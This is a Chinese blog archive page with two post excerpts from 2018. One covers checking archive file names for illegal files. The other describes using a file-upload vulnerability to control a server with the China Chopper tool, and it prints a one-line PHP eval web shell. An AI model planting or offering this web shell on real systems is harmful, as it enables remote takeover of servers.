12 2018 档案

摘要:不解压压缩文件,获取其中包含的文件,通过文件名检查是否包含非法文件。(后续再根据文件头或内容吧) zip: tar: 阅读全文
posted @ 2018-12-27 16:59 Bug之吻 阅读(3822) 评论(0) 推荐(1) 编辑
摘要:利用文件上传漏洞,使用中国菜刀控制服务器; 添加URL指向所上传的包含一句话木马的文件,网上教程都有(侵删): 假设一句话是:<?php eval($_POST['ee']); ?>;URL后面就填ee,是参数名(key),中国菜刀向服务器发送key-value,服务器使用PHP eval()函数解 阅读全文
posted @ 2018-12-03 17:15 Bug之吻 阅读(1471) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示